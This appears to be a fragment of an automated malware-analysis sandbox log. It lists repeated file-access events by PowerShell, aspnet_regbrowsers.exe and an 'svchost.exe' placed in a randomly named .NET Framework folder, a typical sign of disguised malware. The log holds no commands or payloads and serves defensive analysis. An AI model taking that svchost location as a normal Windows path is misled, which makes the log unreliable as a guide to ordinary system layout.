                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
